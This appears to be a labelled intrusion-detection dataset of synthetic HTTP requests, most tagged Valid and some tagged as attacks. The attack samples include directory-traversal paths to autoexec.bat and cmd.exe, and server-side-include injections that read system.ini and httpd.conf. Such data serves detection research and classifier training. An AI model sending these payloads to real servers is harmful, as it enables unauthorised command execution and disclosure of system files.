Start - Id: 33214
class: Valid
PUT /53/-vBKXf/d-9cZei_c3k/lgMaKQKH7ijVQq/lz3TYl9DRcNd/uIApnZh.9/rWEHdErSjI.php? HTTP/1.0
Content-Length: 175
Content-Language: seza3S
Content-Encoding: gzip
Content-Location: http://www.tanhp5h.net/y7re/wufsihc/w1iH/esygt/uecs.pl
Content-MD5: ZXNlY280SWVoaXRlb3RyYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 09 Mar 08 24:56:16 UTC
Last-Modified: Thu, 12 Jan 06 14:08:13 UTC
Host: www.arsyAh.org
Connection: close
Accept: application/*
Accept-Charset: iso-8859-7, x-mac-arabic;q=0.4, iso-8859-4;q=0.2, big5;q=0.6
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-transform
Client-ip: 129.82.95.244
Cookie: ilotuteaZn8=)iihio/n3fajot)0;tmhhIerrp4e=939970;aN7o=&ig
Cookie2: $Version="57"
Date: Sun, 05 Nov 06 21:05:57 UTC
ETag: W/"kRo5RA1ZFcAu3vbV"
Expect: 100-continue
From: na2aepi@d4eieegeg.fr
If-Modified-Since: Sun, 04 Dec 05 09:48:31 CET
If-Unmodified-Since: Mon, 12 Jun 06 23:00:25 CET
If-Match: "A1ihuRfmTTrjtbL"
If-None-Match: "25ecNckVWMPm6uQoiRc"
If-Range: Thu, 20 Mar 08 22:50:25 UTC
Max-Forwards: 5441
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic aGFpaWg6ZHdiZGN2ZQ==
Range: 5-,5-93172,41903-8251
Referer: http://8evox.be/ccson1/sioaAot/ot56yiot/yktn.php3
TE: chunked;q=0.5,chunked
Trailer: Connection
User-Agent: Mozilla/3.5 (Machintosh; U; PPC 6.8; ri-mo; rv:1.5.2) Gecko/97767102
UA-CPU: MIPS
UA-Disp: 3198,1175,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2180x8766
Via: HTTP/9.2 www.gsmyw.htm, 6.1 www.be6auSrs.js:7472, or3os/0.4 www.desEohmo.gif:25
Transfer-Encoding: gzip
Upgrade: moz/2.7, 1rtu/2.1, Krsnnl/7.1, pdmmsr/9.3
Warning: 077 www.beaAsoet.png:0598 "ynai" "Tue, 22 Apr 08 08:27:50 GMT"
X-Forwarded-For: 83.167.179.226
X-Serial-Number: 979942
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

belnn=87362&ynss=uzrma1a81hervtteu&8e1atmy3a=ctsgy&r0ln79es9nar54l=Ainars&0d7sRI=smEe9h&f-I7L=i%~suoy  d%ap&7SDn=2267&X1_XF=572437&tthn=isDNk&s8dx=i1qqMs&_x8RirURK=67667

End - Id: 33214
Start - Id: 45205
class: PathTransversal
GET ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////? HTTP/1.1
Host: 100.123.216.80
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: gzip;q=0.3, gzip;q=0.0, compress;q=0.1
Accept-Language: *;q=0.1
Cache-Control: max-age=6525
Client-ip: 125.250.245.160
Cookie: ehnjoeNoxkea2=163;fns8sAEisN=78327121;caOohumG=eod;ahoSiefhasoasd=nht;@2OQ4in=oo s~<o|w<|rvnS ss ;xbhsdt=insert
Cookie2: $Version="6"
Date: Thu, 26 May 05 05:44:48 GMT
ETag: W/"Xmo5m4bH7_.musI"
Expect: oq0ewer7
From: 6gdote@rgqihciehi.be
If-Modified-Since: Mon, 20 Apr 09 18:34:08 GMT
If-Unmodified-Since: Fri, 15 Aug 08 13:27:35 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 15 Feb 09 18:41:00 CET
Max-Forwards: 28
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: nb6je iukaapia=w5hm8
Authorization: NTLM dHFvaGhyYXBBNmVjb2Vtb3doc2F0ZWh3emVFdG9sc2VkbXJoSGRpcHI=
Range: 706278-,584316-,-67
Referer: http://4eus.be/nidwe/eaeyp0re/0aoiecn/naNea/y1ei1alc.exe
TE: chunked;q=0.9,trailers
Trailer: User-Agent
User-Agent: Mozilla/4.9 (X11; U; Solaris 0.5; ut-mu; rv:3.7.6) Gecko/90424008
UA-CPU: Sparc
UA-Disp: 749,556,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 0142x8254
Via: 6.3 www.aa0iang.html, 4.0 141.248.49.194, 1.6 www.atrmnSl.htm
Transfer-Encoding: nnha; s9idIa9=veriaoo
Upgrade: eimdea/6.6
Warning: 342 www.bgya.css "oc3o7d" 
X-Forwarded-For: 157.255.96.148
----: -------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45205
Start - Id: 8675
class: Valid
GET /ndNt/eZHrPgd0pXYE0H/ExSM/iughL3l37W44_x_/bnNis1ptghy/ssXD2BeZsXit.tiff? HTTP/1.1
Host: 227.132.181.141
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: macintosh, koi8;q=0.0, gb2312
Accept-Encoding: gzip;q=0.2, compress, gzip;q=0.4, gzip;q=0.7, compress
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 139.7.102.37
Cookie: tdnntGi9lt3t1b=el;ebodyREU5ZPpsRV=uierr e(-svsenph-h1v;o5o=36;of=6fiwlT;fo4aXnanlienf7m=3536782;iinEG=itZRTPH4-a
Cookie2: $Version="07"
Date: Mon, 12 Apr 04 22:41:08 CET
ETag: "iY9VMKxeuws3lNflAJKJ"
Expect: 100-continue
From: Xsnt@ceTo3y.it
If-Modified-Since: Thu, 21 Sep 06 07:22:21 GMT
If-Unmodified-Since: Sat, 09 Sep 06 13:19:02 UTC
If-Match: "iTtda5h3crJrdciQtg.h"
If-None-Match: "R9Dt.1rBSJq8vHbvrEOT"
If-Range: "1.kIhHuaBABfsMlPp"
Max-Forwards: 55
MIME-Version: 9.3
Pragma: s0snare='Lwl5e'
Proxy-Authorization: Digest response="DbdAB10dA04Cb5E87ec2504c6CDbdbE0"
Authorization: Digest realm
Range: -766,58-986789
Referer: /cfee1ens.rar
TE: trailers,gzip,chunked;q=0.6
Trailer: Referer
User-Agent: Mozilla/8.1 (Machintosh; U; PPC 7.5; sn-Ti; rv:1.9.4) Gecko/04872673
UA-CPU: MIPS
UA-Disp: 953,263,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 8393x485
Via: FTP/9.6 211.16.111.84, 4.0 119.242.24.211
Transfer-Encoding: compress
Upgrade: eswo/1.2, 2shets/0.9, Ic4/7.0
Warning: 173 52.61.224.109 "iicxlea7tnjtatQp" 
X-Forwarded-For: 16.101.184.213
X-Serial-Number: 396730650206
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 8675
Start - Id: 45461
class: PathTransversal
GET /qXZ4GgkAQ/hKe@Z/7XZhxtermE_/h0JaV8EIyu0Ll/Q@tmp0UZSWA/98BsSk_J6MjL/Lubody3Ncg4L-kuBVE/10eQMQVtelnetdQPs0selecto/eofn/seamp/ol6/flhm8opcass.cfm?58eeocl=%29Qolnprocessing-instruction-t&esrfnfnbanTHrpl=612802&eelrlsib=7&risotie0ew=+m%3Cstylelu%7E&eo0ecetwte=4762425&tpuadegeesaU=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&miaet8xdnpilsrs=s&tsm2ltstlo=tmpt&eesHktoaew6oidq=1825&neeerayhol=nltea63b HTTP/1.0
Host: 242.170.127.35:80
Connection: rbtEpe5
Accept: image/*;q=0.7
Accept-Charset: iso-8859-3, big5, euc-jp
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 39.180.100.162
Cookie: ieont=elaqntnHtmnb;ujwenciacns=etjia8eehrT0Ltn;fYqAmetaPJb3n9s=o2s;srniTamIexdx=nbb6j;lgfmtektiD=rS3qg;uN=0h
Cookie2: $Version="91"
Date: Sat, 05 Jul 08 24:00:21 UTC
ETag: "MWQpBPOD6G9PQ6YY5D"
Expect: Aaanpure=lNoecKtO;sennnr=d0swm
From: eso4Aae@o0ky0.it
If-Modified-Since: Mon, 19 Jan 04 13:39:38 UTC
If-Unmodified-Since: Sun, 13 Aug 06 02:38:01 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 08 Sep 07 20:30:10 CET
Max-Forwards: 19
Pragma: no-cache
Proxy-Authorization: Basic bnRhV29yaXQ6c2Rhcg==
Authorization: ianw cFnsazM=HpFt
Range: -23,7962-,63876-540949
Referer: http://www.eiveDcR.be/6npxdu/ra1tScto/grpduMf/pdwiki7h/dToet.tar.gz
TE: trailers,trailers,trailers
Trailer: Host
User-Agent: Mozilla/1.0 (compatible; MSIE 3.4; Linux i386; Hmevetkh; 4itcetenn)
UA-Disp: 5444,1005,8
UA-OS: Win9x
UA-Color: color8
Via: Ehles/8.4 www.ft17.tiff, HTTP/5.3 www.FTri.css
Transfer-Encoding: deflate
Upgrade: dotvf/0.0, efio7/3.4
Warning: 772 13.181.197.72 "EhhrrueNfweeetlyl" "Sun, 20 Dec 09 03:55:23 GMT"
X-Forwarded-For: 176.191.17.103
X-Serial-Number: 347804024892974921
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45461
Start - Id: 15187
class: Valid
GET /bAkFGvGPEVOCyquyc/ivsyafeo.pl? HTTP/1.0
Host: www.drranhgd.ch
Connection: keep-alive
Accept: text/*, text/*, image/*
Accept-Charset: hz-gb-2312;q=0.0
Accept-Encoding: 
Accept-Language: Ab-ite9g;q=0.2, y5erf-xta, sscp-sbnnt4o;q=0.0, Lca-ixeedxte;q=0.6, stiwii-4EA
Cache-Control: only-if-cached
Client-ip: 132.15.146.53
Cookie: w1NR3lrsae=641081665
Cookie2: $Version="481"
Date: Tue, 06 May 08 16:56:14 GMT
ETag: W/"bk2jeoA94xu4PM.x0VY"
Expect: 100-continue
From: 4hsgsdsi@0euGotls.be
If-Modified-Since: Sat, 13 Nov 04 02:40:05 CET
If-Unmodified-Since: Thu, 27 Mar 08 17:51:51 CET
If-Match: *
If-None-Match: "m5r-7JIU.U0SdQb9Qdm"
If-Range: "-kBhsyvCo0pNxc3C6Xz"
Max-Forwards: 66
MIME-Version: 7.8
Pragma: ee8=Yy
Proxy-Authorization: Basic ekswYTpsSHJlYXJo
Authorization: Hdl7 ikxinln=roivA
Range: 478892-,53727-
Referer: http://www.dt4locot.cz/iueLeh/dbsMdtl/4lutxghE/ctabsiei.jpeg
TE: gzip
Trailer: Range
User-Agent: andtdie (sI8gGO5d@; ad3aMUDBX; 6C45VlFNL; dYY5QSg)
UA-CPU: x86
UA-Disp: 5093,9820,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1443x630
Via: 1.4 94.195.189.236, FTP/3.9 114.244.112.95
Transfer-Encoding: gzip
Upgrade: 7jpt9/1.4, who/8.3, alnadh/2.9, eAa/5.4, imc/9.8
Warning: 672 146.81.253.52 "jtadl" "Mon, 09 Feb 04 19:26:43 CET"
X-Forwarded-For: 236.127.123.213
X-Serial-Number: 656353
----: ----------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 15187
Start - Id: 15930
class: Valid
GET /dO9a/eXT-_D.hL2BC.sh? HTTP/1.1
Host: www.47aasernw4.com:80
Connection: s6E2fSi
Accept: image/*;q=0.3, audio/x-wav
Accept-Charset: koi8-r, utf-7;q=0.5, koi8;q=0.8, euc-kr, x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: sii2nB7='uni'
Client-ip: 83.250.121.68
Cookie: ezTNtji1h=srg;CwinntPSI-wjNk=f4RPHNH6fh;neIbe0rerrdxfe=2940899;ESu=50960;nddroptwhere@and=8;eadesrbo=38424337
Cookie2: $Version="571"
Date: Thu, 18 Aug 05 07:11:10 CET
ETag: "wDPS67A9Gjc8ST-FO"
Expect: 100-continue
From: 7Am9i@jeexcst4.it
If-Modified-Since: Mon, 03 Mar 08 11:46:17 GMT
If-Unmodified-Since: Sun, 29 Apr 07 20:18:46 GMT
If-Match: *
If-None-Match: *
If-Range: "4eQWf6hW8u6GN-SyMTi"
Max-Forwards: 3
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Basic OU5Ucmk1OnNzRWxh
Authorization: Digest realm
Range: -08,0744-,-43437
Referer: http://i6n3n.cz/xyHrilr9/Na4ne5/Nvea.cfm
TE: deflate;q=0.0,trailers
Trailer: Accept-Charset
User-Agent: odpeptahEb (pcS0-o.D)
UA-CPU: x86
UA-Disp: 9960,6267,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7490x6757
Via: 4.1 145.241.172.175:4, 3.0 3.187.183.123, 5.0 www.futOL.jpg
Transfer-Encoding: btYp; iHktyiiT=oceEs
Upgrade: otrq/6.0, doyu/0.7, risbrn/5.4, noosNE/3.1, tej/4.1
Warning: 995 53.244.110.121:7 "1r8eHzltlemAerit5" "Sun, 28 Feb 10 23:52:29 CET"
X-Forwarded-For: 34.10.5.61
X-Serial-Number: 1437240806
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15930
Start - Id: 8093
class: Valid
GET /s55y.wAvjVp10R/nQ/qlym1qeHoooini1soer8/tooV/3sEgie1hl4ntsl/WVhi0z/VbodyRxs7WgC/o.-t8ikmA5HuFYW/lOIuqmPmu7/tt5kiBaY2E5/wa_e0t_.swf?execpKAx9vMxml=hbfen5dcd&gayatsenl=vuerrbfKfveu9aFb&neHus=tunionheOr96t819T&lo=0&tlw7cafstsfatae=oni%27sRNli&sock_streamLzluUXx=58&lNgNewekeeme2=37 HTTP/1.0
Host: www.mhwvjpods.ch:5229
Connection: yq8ybna
Accept: */*
Accept-Charset: windows-874;q=0.0, x-mac-turkish;q=0.8, utf-7;q=0.5, x-mac-arabic;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=1
Client-ip: 16.152.221.65
Cookie: 0Rmtn=ete5connectneaoavtema;s9nLr=mtfrompI=G4htEetchildz;hWenhvdtae=1
Cookie2: $Version="9"
Date: Tue, 07 Oct 08 20:29:37 GMT
ETag: "FbNg3rQ5XAq7NChtYOgU"
Expect: 100-continue
If-Modified-Since: Mon, 04 Jul 05 22:15:54 GMT
If-Unmodified-Since: Fri, 22 Jun 07 22:21:48 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 15 Aug 08 03:09:11 UTC
Max-Forwards: 873
MIME-Version: 2.4
Pragma: fcnraf23=asr
Proxy-Authorization: Basic ZWNkSWllOndzam1xZQ==
Authorization: Basic dTNlaWhsOmxJb3luZWE=
Range: 96926-503180,-72
Referer: /4gnt8/Eictgte/sw3h/EOahwsbi/nori4.nsf
TE: chunked,trailers
Trailer: Proxy-Authorization
User-Agent: oeasRas9oe (n9dkw9z)
UA-CPU: x86
UA-Disp: 4009,1990,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 308x6685
Via: 1.4 www.aooaecrt.htm
Transfer-Encoding: gzip
Upgrade: ct84i/3.2, vnwu2/3.1, thbz/5.5
Warning: 742 www.5eiisbn6.jpg "s7nmb8eks7phhnpbq8e" "Thu, 28 Apr 05 22:22:02 GMT"
X-Forwarded-For: 20.60.245.141
X-Serial-Number: 74656
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8093
Start - Id: 44248
class: OsCommanding
GET /PBServer/..��../..��../..��../winnt/system32/cmd.exe?/c+dir+c:0 HTTP/1.1
Host: 210.100.20.150
Connection: keep-alive
Accept: application/*;q=0.2, image/*;q=0.2, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Owletar-iahe;q=0.9, lss72e0o-dcpot, r-trcolore, fm8eawlv-rjima;q=0.7, thl5ee-y
Cache-Control: max-age=1302
Client-ip: 182.20.30.117
Cookie: lsboI35en=5eo7ln;fe=fey;seiTr=p1
Cookie2: $Version="0"
Date: Fri, 09 May 08 16:25:17 CET
ETag: "-8T0kbq_jilGiD3"
Expect: ohder2=drntNg
From: ided@udhoes.uk
If-Modified-Since: Tue, 09 Oct 07 03:46:43 GMT
If-Unmodified-Since: Tue, 28 Dec 04 13:56:19 CET
If-Match: "jSRoJer_RD4y28gIjjo"
If-None-Match: "JK0huRf887lS7kE43t"
If-Range: *
Max-Forwards: 59
MIME-Version: 7.7
Pragma: kadlo3=ttpvis
Proxy-Authorization: Basic YmVhemVzOmF0b2dhbGU=
Authorization: Digest qop=auth
Range: 9644-,6569-1848
Referer: http://fThr.org/thpnatoN/nerhf/yadisu.mpg
TE: trailers
Trailer: Range
User-Agent: Mozilla/5.1 (Machintosh; U; Mac OS X 5.0; t8-wi; rv:1.9.7) Gecko/04964520
UA-CPU: Sparc
UA-Disp: 220,5543,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 352x848
Via: HTTP/4.1 104.245.120.13, HTTP/2.1 245.174.241.3:8
Transfer-Encoding: 6ris; osgnkcE=urwji
Upgrade: hrl/2.7, tuad/2.6, kea/2.0, vowi/4.8
Warning: 254 www.7iedsus.jpg:00477 "ntLgsd" 
X-Forwarded-For: 159.74.103.38
X-Serial-Number: 87791101469123011682
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44248
Start - Id: 31577
class: Valid
GET /eY2Q@6F6n/aryclrdnol/nastamseoicag/bdIunv8/LobjectO3I19/sxFmp/fLkkF/rmoafn/pglJk9/ZPzuT6wqitmpH.UD.bin? HTTP/1.1
Host: www.jgsy.st
Connection: rdSixue
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: lrly9=8hhciGe
Client-ip: 19.207.118.61
Cookie: osM=18;t0envgpissHte=4ZQBnCXqTQq6;MrcpEQTrshutdown5=s1L1M;jbSad=oopositionr7ure
Cookie2: $Version="6"
Date: Tue, 18 Mar 08 06:32:14 UTC
ETag: "9XfmZol.XzahIx7yme"
Expect: ercS=tttkss
From: iaar@tt4tqltp.org
If-Modified-Since: Tue, 04 Nov 08 09:52:57 GMT
If-Unmodified-Since: Wed, 23 Nov 05 20:21:01 GMT
If-Match: "1pPw0HGOj8vrSUfL4q"
If-None-Match: "jowfQH21ip_VmeEMYsPO"
If-Range: "DwLiMiYpUm2Z-4kg"
Max-Forwards: 6445
MIME-Version: 7.2
Pragma: 0eaqr=esn
Proxy-Authorization: Digest qop=auth
Authorization: NTLM NEZuT3RSZ0lSOGRsdGFhaTNFc2xpNnJoZGRvaHRycnNicnFITU82bE8=
Range: -40023,010285-,775998-
Referer: http://tdhe.biz/uOtueohd/2Mhod7S/matau.jpeg
TE: gzip;q=0.2,gzip
Trailer: Authorization
User-Agent: nknerooHeparadnnT
UA-CPU: PowerPC
UA-Disp: 7964,455,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 951x498
Via: 0.9 www.nTuire.png:78, 5.5 www.menr.jpeg
Transfer-Encoding: identity
Upgrade: mnu6a9/9.2, fhxH/0.0, aus/8.5, Eahlfs/8.9, aeEioe/8.1
Warning: 589 www.sraa.jpg:2 "qNtoiOeto6ouittmpa" "Sat, 31 Oct 09 17:56:47 GMT"
X-Forwarded-For: 190.159.59.68
X-Serial-Number: 9453727833196
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 31577
Start - Id: 40371
class: SSI
GET /t9tindoEhwmdnle/sAa/nteree6Tsed/nimht/reter9nwtwmnrasi/amnaLNheustaatiGtW/snc/nob4oxa8tEiss/ilgLjB/eI.NBeT4Eyrna.pl?rmuwmL1B4cpT=rrRHTiMfnxB&Oer=1%26uk%3B&urntgnu=18&PTM-3cgR=+ati&lh2e=tenne2xlrphSHs&MutelioOCt2rw=bHxi&maEaehsa7Ei=3-uwE&orch9med=66386 HTTP/1.0
Host: www.oiea.it
Connection: close
Accept: image/png;q=0.6, text/plain, video/*
Accept-Charset: *
Accept-Encoding: <!--   #include    virtual="c:\winnt\system.ini"-->
Cookie2: $Version="674"
Date: Wed, 14 Dec 05 04:36:11 CET
Expect: 100-continue
If-Unmodified-Since: Fri, 22 May 09 24:13:14 GMT
If-Match: "Fel7RSWj1dV.5Z_MPY"
Pragma: no-cache
Referer: /oxhtriu/thniert/xitae.mpeg
User-Agent: Mozilla/0.1 (compatible; Konqueror/7.6; Open BSD i586; tiroT6)

null

End - Id: 40371
Start - Id: 1657
class: Valid
GET /bgeafa.cfm?cRwM=wItc1EpwNalhoA&fbinherEett3B65=91&3rec=dsV3&5weSEibyh5r=tdAmiuHrhe7aagi&nexsntiEye=4LenetNr&ooeoeiu7ak7=43&nGmochax=eeyoecfcEobaeZt4&Eyelraat5eitN=e%40Ykm&cEi0sthgu=ebzyehezm6ar&homeFwG2includeiiframeNYT1=e15%7C%29ora%40httpy-7eeu&iooaeAnaatte7=e++Avarw+mdivo1%2F HTTP/1.0
Host: 83.251.231.232
Connection: close
Accept: text/*, application/rtf;q=0.1
Accept-Charset: utf-7;q=0.0, iso-8859-7, iso-8859-4;q=0.1, iso-2022-kr;q=0.1, iso-8859-5
Accept-Encoding: *;q=0.0
Accept-Language: derrI-1cnetryh, mtb-inns6g
Cache-Control: max-age=471
Client-ip: 233.154.243.51
Cookie: 9undtWn=eu;edh6Tuotjide=i3V;w6rghacteTntos=~~a;s;V39hltyu=ynrdan4nu;R8lstlbKtrEhnq9=962592
Cookie2: $Version="67"
Date: Thu, 31 Dec 09 03:32:48 UTC
ETag: W/"bMCVqCdZp90EHMf8XQ5"
Expect: 100-continue
From: S6tD@nser.com
If-Modified-Since: Mon, 05 Apr 04 06:01:28 GMT
If-Unmodified-Since: Sun, 21 Jan 07 23:37:01 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 14 Jun 06 24:46:19 UTC
Max-Forwards: 6
MIME-Version: 9.8
Pragma: mmiiu3gr='uteiat'
Proxy-Authorization: sesl mseen0c=dlpAam
Authorization: Digest username="hhore"
Range: 94-
Referer: http://www.tbrs.de/mfmyu/rnxso4/hewwtin.pdf
TE: chunked,chunked,gzip
Trailer: Via
User-Agent: Mozilla/2.2 (compatible; Konqueror/6.2; Open BSD i586; tsmyr; epWhsdee)
UA-CPU: 68000
UA-Disp: 6093,2247,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3594x3874
Via: HTTP/2.2 240.65.84.192
Transfer-Encoding: deflate
Upgrade: toe/3.4, erkdin/7.1, 5elTNe/2.3, n0otGk/3.5
Warning: 713 www.liacs.shtml "tenh1oogsntt7wsMck" 
X-Forwarded-For: 111.79.187.206
X-Serial-Number: 65212341307
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1657
Start - Id: 10975
class: Valid
GET /4-b3VfkWtfqlPwL8/crlay/_documentyYCyK852z8/EXSe9.gif?74Tsih=23896855&yrI@etc=11309&hthla0es6lhle=nqles HTTP/1.0
Host: www.haNsr.cz
Connection: svetiynl
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: min-fresh=42748
Client-ip: 140.216.174.21
Cookie: dSnph-copyDcNcWg=lvarpoO od;eqae9xpetd=os'-b
Cookie2: $Version="75"
Date: Fri, 08 Aug 08 17:54:12 GMT
ETag: W/"xjb@uGU9r9HKTDPbYHJ"
Expect: 100-continue
From: e5rsien@oece.be
If-Modified-Since: Mon, 29 Jan 07 02:12:40 GMT
If-Unmodified-Since: Sat, 06 Sep 08 06:26:43 GMT
If-Match: *
If-None-Match: *
If-Range: "69d7Ah3Ku7Y1sWRW-@"
Max-Forwards: 5
MIME-Version: 9.3
Pragma: tgbmh='oUtai'
Proxy-Authorization: NTLM aHQzbnNvZTNyamVjZWRhYXRzRnRhZ2hscDRwNXEzaDZrYWFuaml1MXI=
Authorization: NTLM eDFObHNlaWRobXBsYWRnb3NzSGRlb3NpaWVvRGdpZWFycGlldGVMYmd3
Range: 415535-51
Referer: /8uof7h/hlay/ghejb/b9drM3ht.cgi
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/2.3 (Machintosh; U; PPC 5.8; i2-cu; rv:0.8.1) Gecko/46861437
UA-CPU: Sparc
UA-Disp: 487,6380,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 124x705
Via: 2.1 www.onteNse.css, HTTP/8.1 www.do2se.jpg:684, FTP/3.8 235.2.210.16
Transfer-Encoding: gzip
Upgrade: sgsic/5.6, ntlan/7.1, 6jase/6.4
Warning: 129 19.178.6.205 "ai8uyuhunesnRqb" 
X-Forwarded-For: 237.166.249.162
X-Serial-Number: 17087592
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10975
Start - Id: 8780
class: Valid
GET /tJunm-9Qe_LyQvKNB-/iuEz@Ghoj/VOm5/Atgrbnm/cUSYL.0RSOO.png?rrnemn9N1es=481&istcdt=i5&At7Mis=96010&bnioamn=9499634&nnbleludg=ta%40vdLXbn&SehkubteEseioc=eS38ZaLEnk&t28ird7=7607847&807S=rpl&EazskooedlEf=xchildoeS9un-ae&akoa=ls0dthte&3hihmckt9guctgv=29&uradta32=utnbsmetaasrrgjt&7tief5e9on=esnLs&dcFlAcLc3eyzi=ig+ef+jedSt&hhaditpkg=noyTyE.0N HTTP/1.1
Host: 168.98.106.127
Connection: itfTrhe
Accept: image/jpeg
Accept-Charset: *;q=0.4
Accept-Encoding: deflate
Accept-Language: emena6P-eags, biS-ineL9gln
Cache-Control: max-stale
Client-ip: 184.38.170.151
Cookie: IeTLeaehoqtsutx=3874188;owzkN5siltitia=auYGl@tTot9l;edinbbh3Sxs=99619263;.-PB=976532;e6eas=zfk8z;ag2l=Eia
Cookie2: $Version="39"
Date: Tue, 28 Oct 08 22:02:43 UTC
ETag: "fce7_Rvgq32my2N"
Expect: 100-continue
From: ytshor@Dl5ho0zri.ch
If-Modified-Since: Thu, 22 Sep 05 10:39:47 GMT
If-Unmodified-Since: Fri, 11 Jun 04 06:47:26 GMT
If-Match: "GiBpV7ySLsRQiIc_"
If-None-Match: *
If-Range: *
Max-Forwards: 121
MIME-Version: 1.9
Pragma: 9ndr2reu='1iy'
Proxy-Authorization: Basic aXRzaWU6ZGxlZA==
Authorization: Basic dEJzOHl0Om9lYWU5
Range: -87767
Referer: http://www.t5rI.uk/aaatsi/twC5ej.asp
TE: chunked,deflate;q=0.0
Trailer: Accept-Encoding
User-Agent: Mozilla/8.7 (Windows; U; Win 9x 7.9; tc-it; rv:2.0.1) Gecko/09458929
UA-CPU: 68000
UA-Disp: 735,9558,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 633x2304
Via: 7.1 145.222.190.69, HTTP/6.2 25.249.61.161, OisRn/1.2 40.124.80.139
Transfer-Encoding: gzip
Upgrade: T1aR/3.7
Warning: 295 www.nais.htm "ioTseniTrnsie" 
X-Forwarded-For: 71.221.125.93
X-Serial-Number: 28573562
----: ---------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 8780
Start - Id: 39577
class: SSI
PUT /fnte6oo0r/ogRqESCg/lvehhlzusee.mspx? HTTP/1.0
Content-Length: 213
Content-Language: ssOrht,sn1ettVh,tubl7
Content-Encoding: identity
Content-Location: /onro/fnecedr/4snNii4/5anp.dll
Content-MD5: eWV0bGVhR29zY2V0Tk1OZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 21 Nov 06 23:15:18 GMT
Last-Modified: Fri, 18 Feb 05 19:22:42 UTC
Host: www.hliga.st
Connection: hnrsa
Accept: */*
Accept-Charset: windows-1251;q=0.0, iso-8859-4;q=0.1, x-mac-cyrillic;q=0.5, iso-8859-4, utf-7;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: agbnne4='rzigaI'
Client-ip: 145.102.168.110
Cookie: dsai=n;lymt=iAeea;riPoeraOH9891na=ygwnMzZi;CmetaADn@=dmi otanaA0ps;nph-_nQd8ooa=582046
Cookie2: $Version="0"
Date: Tue, 06 Oct 09 17:04:10 UTC
ETag: "E-DjyT8l5_1VDtzNt-o"
Expect: t7ug=t2ana;oee3=fmtY
If-Modified-Since: Sat, 30 Jun 07 04:17:02 UTC
If-Unmodified-Since: Sat, 10 Oct 09 11:28:42 CET
If-Match: "60iTwuKyZWjIevA"
If-None-Match: *
Max-Forwards: 739
Pragma: no-cache
Authorization: NTLM a2RkZHVoZ2V0RWF0ZWhpN25jaXV0c280aUVvZ29wbDJvaW50bGdMYWtlcW9u
Referer: /epl6/maau.mspx
TE: trailers,gzip;q=0.4
User-Agent: rEn3oNm_ http://www.rkqotdF.org
UA-CPU: x86
UA-OS: Windows 98
Via: 1.4 147.201.129.5, 6.7 42.203.74.130, FTP/6.8 www.coGgsodh.htm
Transfer-Encoding: compress
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

nqlLNng=2ofb/&reeoenO=<!--     #include    virtual="/etc/httpd/httpd.conf"-->&eBfntgYIodecp=ddNot6dQ&r8cun8od=ancgnsfo7a1st&y0biaeewfoitatn=eloWdcn1io&w3eenssvr=q&ondwisOdcwwwo=mo3s&ndtsz=848

End - Id: 39577
Start - Id: 7284
class: Valid
PUT /iry5ktiei/dnaeeechahaha/erbaJwUQwgWmLe4pCM/bPNQ5D785IeTBnYG.jpeg? HTTP/1.1
Content-Length: 202
Content-Language: dhs5mlna
Content-Encoding: gzip
Content-Location: /msxoldrt/54hrjd.exe
Content-MD5: YUdtMm55c2h0ZW1hVGNncw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 24 Oct 09 23:23:14 UTC
